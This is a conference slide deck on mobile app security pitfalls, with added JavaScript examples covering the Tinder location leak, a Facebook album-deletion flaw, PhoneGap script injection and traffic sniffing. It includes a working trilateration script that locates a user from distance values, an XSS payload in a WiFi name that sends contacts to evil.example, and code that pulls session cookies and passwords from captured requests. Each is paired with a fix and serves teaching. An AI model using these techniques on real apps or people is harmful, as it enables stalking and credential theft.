mobile app security best practices
![Page 1: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/1.jpg)
Mobile Security Pitfalls
Common goofs we make and how to avoid them
Ynon Perek
tocode.co.il
![Page 2: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/2.jpg)
You Don’t Need To Be a Hacker
✤ Bug -> Vulnerability -> Exploit
✤ Hackers use exploits
✤ We’ll focus on fixing bugs
![Page 3: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/3.jpg)
Types of Vulnerabilities
(Diagram) Technical: Platform, Application, Server, Communication. Human Factor.
![Page 4: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/4.jpg)
Need To Protect…
✤ Our own private data
✤ Server
✤ Application secrets
✤ Our user’s private data
![Page 5: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/5.jpg)
Guidelines: Server
✤ Assume Evil Teddy Bear is writing your client app
✤ Now write the server
![Page 6: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/6.jpg)
Common Security Pitfalls - Server
✤ Trusting client application with too much data
✤ Leaving secrets in application source code
✤ Leaving server unprotected
![Page 7: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/7.jpg)
Demo: Tinder Location Bug
![Page 8: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/8.jpg)
Demo: Tinder Location Bug
Fragment of the API response handed to every client (the pos field is the user's exact coordinates):

```json
"birth_date": "1992-06-24T00:00:00.000Z", "gender": 1, "name": "Daisie", "pos": { "lon": -73.9977375759311, "lat": 40.72255556095288 }, "fbId": "185"
```
![Page 9: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/9.jpg)
And the fix ???
```json
"photos":[ ... ],"id":"52617e698525596018001418","common_friends":[],"common_likes":[ ],"common_like_count":0,"common_friend_count":0,"distance_mi":4.760408451724539
```
![Page 10: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/10.jpg)
Found Ya!
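The slides replace the raw pos field with distance_mi carried to fifteen decimal places, and the next slide still says Found Ya!. The block below, an added example that is not code from the talk, shows why: Evil Teddy Bear wrote the client, so the position it reports to the server is whatever he chooses, and three distance readings taken from chosen vantage points trilaterate the target. It also shows the fix that actually holds, coarsening the stored position on the server side. The TARGET coordinates are the ones in the sample response above; the PROBES, the grid size and every function name are assumptions of this example.

```javascript
// Added example (not the talk's code): trilaterating a user from the
// distance_mi field and what server-side coarsening changes.
// TARGET is the "pos" from the slide's sample response; PROBES are assumed.
const EARTH_RADIUS_MI = 3958.8;
const MI_PER_DEG = (Math.PI / 180) * EARTH_RADIUS_MI; // ~69.09 mi per degree of latitude

const TARGET = { lat: 40.72255556095288, lon: -73.9977375759311 };

// Evil Teddy Bear wrote the client, so the "my position" it reports is
// whatever he wants; these three vantage points are constructed.
const PROBES = [
  { lat: 40.75, lon: -74.0 },
  { lat: 40.7, lon: -73.95 },
  { lat: 40.7, lon: -74.03 },
];

const toRad = (deg) => (deg * Math.PI) / 180;

// Great-circle distance in miles between two { lat, lon } points.
function haversineMi(a, b) {
  const dLat = toRad(b.lat - a.lat);
  const dLon = toRad(b.lon - a.lon);
  const h =
    Math.sin(dLat / 2) ** 2 +
    Math.cos(toRad(a.lat)) * Math.cos(toRad(b.lat)) * Math.sin(dLon / 2) ** 2;
  return 2 * EARTH_RADIUS_MI * Math.asin(Math.sqrt(h));
}

// Server-side coarsening: compare against a grid-snapped position (a 0.01
// degree cell is roughly 0.7 mi) so the exact point never reaches any client.
function snapToGrid(pos, cellDeg = 0.01) {
  return {
    lat: Math.round(pos.lat / cellDeg) * cellDeg,
    lon: Math.round(pos.lon / cellDeg) * cellDeg,
  };
}

// What the server writes into distance_mi for a client claiming to be at
// `requester`. digits=15 is what the "fixed" response on the slide shows.
function serverDistance(requester, target, { digits = 15, coarsen = false } = {}) {
  const stored = coarsen ? snapToGrid(target) : target;
  return Number(haversineMi(requester, stored).toFixed(digits));
}

// Attacker side: three observations { lat, lon, d }, solved in a local
// tangent plane measured in miles with observation 0 at the origin.
function trilaterate(obs) {
  const [o0, o1, o2] = obs;
  const k = MI_PER_DEG * Math.cos(toRad(o0.lat)); // miles per degree of longitude here
  const toXY = (p) => [(p.lon - o0.lon) * k, (p.lat - o0.lat) * MI_PER_DEG];
  const [x1, y1] = toXY(o1);
  const [x2, y2] = toXY(o2);
  // Subtracting circles 1 and 2 from circle 0 cancels the squared unknowns,
  // leaving two linear equations: a*x + b*y = c and d*x + e*y = f.
  const a = 2 * x1, b = 2 * y1, c = o0.d ** 2 - o1.d ** 2 + x1 ** 2 + y1 ** 2;
  const d = 2 * x2, e = 2 * y2, f = o0.d ** 2 - o2.d ** 2 + x2 ** 2 + y2 ** 2;
  const det = a * e - b * d;
  if (Math.abs(det) < 1e-9) throw new Error("probes are collinear; move one");
  const x = (c * e - b * f) / det;
  const y = (a * f - c * d) / det;
  return { lat: o0.lat + y / MI_PER_DEG, lon: o0.lon + x / k };
}

// Run the attack against a server with the given settings; returns the
// estimate and how far it is (in miles) from the real position.
function locate(opts = {}) {
  const obs = PROBES.map((p) => ({ ...p, d: serverDistance(p, TARGET, opts) }));
  const est = trilaterate(obs);
  return { est, errorMi: haversineMi(est, TARGET) };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, opts] of [
    ["distance_mi to 15 decimals", {}],
    ["distance_mi rounded to whole miles", { digits: 0 }],
    ["stored position snapped to a grid", { coarsen: true }],
  ]) {
    const { est, errorMi } = locate(opts);
    console.log(`${label}: ${est.lat.toFixed(5)}, ${est.lon.toFixed(5)} (off by ${errorMi.toFixed(3)} mi)`);
  }
}
```

With the precise distance the estimate lands within a few metres of the real position. Rounding the displayed distance alone is not a fix either: the true distance then sits in a half-mile band, and an attacker who nudges the probe position until the rounded value flips recovers the band edge, so repeated queries narrow it down again. Snapping the stored position to a grid before computing the distance bounds what any number of queries can reveal, which is the property a server actually needs.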
![Page 11: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/11.jpg)
How I Hacked Your Facebook Photos
Request:

```http
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD
```

Response:

```json
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}
```
![Page 12: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/12.jpg)
Now let’s try with FB for Android token …
Request:

```http
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>
```

Response:

```
true
```
![Page 13: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/13.jpg)
Interesting, Now let’s try another album…
Request:

```http
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>
```

Response:

```
true
```
OMG! Album Got Deleted
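Reduced to a single server-side check, the failure in the requests above is that the API verified which application the token belonged to and stopped there: a token for the first-party app could delete an album that did not belong to the token's user. Below is an added illustration, not Facebook's code, of the same handler written both ways. The app names, tokens and album ids are made up for the example; the #200 error text is the one in the response shown on the slide.

```javascript
// Added example (not Facebook's code): an album-deletion handler with the
// capability-only check beside the fixed version that also checks ownership.
// Album ids, app names and tokens here are constructed.
const ALBUMS = new Map([
  ["518171421550249", { owner: "victim" }],
  ["999000111", { owner: "attacker" }],
]);

// Per-application capabilities: only the first-party client may delete albums.
const APPS = new Map([
  ["fb-for-android", { canDeleteAlbums: true }],
  ["third-party-app", { canDeleteAlbums: false }],
]);

// Access tokens: which user they were issued to, and through which app.
// The attacker legitimately holds both of these for their own account.
const TOKENS = new Map([
  ["tok-attacker-3p", { user: "attacker", app: "third-party-app" }],
  ["tok-attacker-android", { user: "attacker", app: "fb-for-android" }],
]);

const NO_CAPABILITY = {
  ok: false,
  error: "(#200) Application does not have the capability to make this API call.",
};

// Vulnerable: the only question asked is "may this app delete albums?"
// A yes answer deletes whatever id the client names.
function deleteAlbumVulnerable(token, albumId, albums = new Map(ALBUMS)) {
  const session = TOKENS.get(token);
  if (!session || !APPS.get(session.app).canDeleteAlbums) return NO_CAPABILITY;
  albums.delete(albumId);
  return { ok: true, remaining: [...albums.keys()] };
}

// Fixed: the capability check is necessary but not sufficient. The album must
// belong to the user the token was issued to (object-level authorization).
function deleteAlbumFixed(token, albumId, albums = new Map(ALBUMS)) {
  const session = TOKENS.get(token);
  if (!session || !APPS.get(session.app).canDeleteAlbums) return NO_CAPABILITY;
  const album = albums.get(albumId);
  if (!album || album.owner !== session.user) {
    // Same answer for "no such album" and "not yours": don't confirm the id exists.
    return { ok: false, error: "album not found" };
  }
  albums.delete(albumId);
  return { ok: true, remaining: [...albums.keys()] };
}
```

The ownership test has to run on the server against the server's own record of who owns the object; anything the client sends about itself (including "I am the official app") is just a claim.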
![Page 14: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/14.jpg)
Bug Bounty Programs
https://hackerone.com/
![Page 15: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/15.jpg)
Getting It Wrong: Parse Todo App
http://code.tutsplus.com/tutorials/getting-started-with-parse--net-28000
![Page 16: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/16.jpg)
Getting It Right: Parse Todo App
http://todolist.parseapp.com/#
![Page 17: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/17.jpg)
And now for the client
(Vulnerability-types diagram, repeated: Technical: Platform, Application, Server, Communication. Human Factor.)
![Page 18: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/18.jpg)
Guidelines: Client app
✤ Assume phone was hijacked by evil teddy bear
✤ Assume server was hacked by evil teddy bear
✤ Assume all external data is fed in by evil teddy bear
![Page 19: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/19.jpg)
Apple Storing Location Data in iOS4
What makes this issue worse is that the file is unencrypted and unprotected, and it’s on any machine you’ve synched with your iOS device…
http://radar.oreilly.com/2011/04/apple-location-tracking.html
![Page 20: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/20.jpg)
JS Code Injections
(Diagram) Evil Hacker -> Web Application (Email) -> Honest User: the hacker sends a message to the honest user, and the message includes evil JS code.
![Page 21: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/21.jpg)
Why Is It Bad?
✤ PhoneGap apps provide no protection against evil JS
✤ Injected JS runs with the app's own privileges and can use all device capabilities
![Page 22: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/22.jpg)
JS Code Injections - PhoneGap
✤ WiFi network names
✤ QR Code
✤ NFC
✤ SMS
✤ Address Book
✤ iFrames
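Every item in that list is a string chosen by someone else that the app ends up rendering. The added example below, which is not from the talk, shows a WiFi scan result with one poisoned SSID rendered by string concatenation and then with escaping, plus the DOM-based form that never parses the string as HTML at all. The SSID list and the payload are constructed; the payload's call to navigator.contacts.find is illustrative of what an injected handler could reach through PhoneGap's plugins.

```javascript
// Added example (not the talk's code): one external string rendered two ways
// inside a PhoneGap webview. SCAN_RESULT is constructed; the payload's use of
// navigator.contacts.find is illustrative of what injected JS can reach.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// A WiFi name, QR code, NFC tag, SMS or contact entry is just bytes someone
// else chose. The second SSID here is a payload: it renders a broken image
// whose onerror handler reads the address book and posts it to the attacker.
const SCAN_RESULT = [
  "CoffeeShop-Guest",
  "<img src=x onerror=\"navigator.contacts.find(['*'], function (c) {" +
    " new Image().src = 'http://evil.example/?c=' + encodeURIComponent(JSON.stringify(c)); })\">",
];

// Vulnerable: markup built by concatenation. When the caller assigns this to
// innerHTML the handler runs with the app's full device access.
function renderNetworksVulnerable(ssids) {
  return "<ul>" + ssids.map((s) => `<li>${s}</li>`).join("") + "</ul>";
}

// Fixed: every untrusted value is escaped before it touches markup; the
// payload is displayed as text, which is all an SSID should ever be.
function renderNetworksFixed(ssids) {
  return "<ul>" + ssids.map((s) => `<li>${escapeHtml(s)}</li>`).join("") + "</ul>";
}

// Better still in a real app: build nodes and set textContent, so the string
// is never parsed as HTML at all. `doc` is the webview's document.
function renderNetworksDom(ssids, doc) {
  const ul = doc.createElement("ul");
  for (const s of ssids) {
    const li = doc.createElement("li");
    li.textContent = s;
    ul.appendChild(li);
  }
  return ul;
}
```

The escaped form is safe for element content and double-quoted attribute values; a value placed inside a script block, a URL or an event-handler attribute needs a different encoding, which is why the DOM version is the habit worth building. Where the webview honours it, a Content-Security-Policy meta tag in index.html that forbids inline script catches the cases a developer misses.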
![Page 23: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/23.jpg)
Communication Layer
(Vulnerability-types diagram, repeated: Technical: Platform, Application, Server, Communication. Human Factor.)
![Page 24: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/24.jpg)
Guidelines: Communication
✤ Oh no, evil teddy bear PWNS the router
✤ Encrypted
✤ Authenticated
✤ Tamper proof
✤ => HTTPS
![Page 25: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/25.jpg)
Remember Firesheep?
![Page 26: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/26.jpg)
Demo: Listening on unencrypted mobile traffic using a proxy
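As an added example of what that demo shows, and not the talk's own tooling: a parser for one plaintext request as a proxy on the router would see it, pulling out everything an eavesdropper needs in order to become the user, which is exactly what Firesheep automated for web sessions. The captured request, the host name and the cookie, token and credential values are all constructed.

```javascript
// Added example (not the talk's demo): what a proxy on a hostile router sees in
// one unencrypted request. The capture below is constructed; host, cookie,
// Basic credentials and access_token are made-up values.
const CAPTURE = [
  "GET /api/v1/messages?access_token=abc123def456&page=2 HTTP/1.1",
  "Host: api.example-app.com",
  "User-Agent: ExampleApp/2.1 (iPhone; iOS 7.0)",
  "Cookie: sessionid=s3cr3t-session-value; theme=dark",
  "Authorization: Basic YWxpY2U6aHVudGVyMg==",
  "",
  "",
].join("\r\n");

// Split a raw HTTP/1.1 request into its request line and a header map.
function parseHttpRequest(raw) {
  const [head] = raw.split("\r\n\r\n");
  const [requestLine, ...headerLines] = head.split("\r\n");
  const [method, target, version] = requestLine.split(" ");
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i === -1) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, version, headers };
}

// Collect everything in the request that would let the eavesdropper
// impersonate the user: session cookies, Authorization, tokens in the URL.
function extractSecrets(req) {
  const found = {};
  for (const part of (req.headers.cookie || "").split(";")) {
    const [name, ...rest] = part.trim().split("=");
    if (/^(sessionid|session|sid|auth|token)$/i.test(name)) {
      found[`cookie:${name}`] = rest.join("=");
    }
  }
  if (req.headers.authorization) {
    const [scheme, value] = req.headers.authorization.split(" ");
    // HTTP Basic is base64, not encryption: the password is right there.
    found.authorization =
      scheme === "Basic" ? Buffer.from(value, "base64").toString("utf8") : req.headers.authorization;
  }
  const q = req.target.indexOf("?");
  if (q !== -1) {
    for (const [k, v] of new URLSearchParams(req.target.slice(q + 1))) {
      if (/token|key|secret/i.test(k)) found[`query:${k}`] = v;
    }
  }
  return found;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(extractSecrets(parseHttpRequest(CAPTURE)));
}
```

Everything the function returns is reusable as-is from another device, which is the whole Firesheep trick. HTTPS closes this only when the client actually verifies the server certificate; an app that disables validation to get past a self-signed development certificate has handed the router back its seat in the middle.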
![Page 27: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/27.jpg)
Q & A
![Page 28: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/28.jpg)
Thanks For Listening
✤ Ynon Perek
✤ tocode.co.il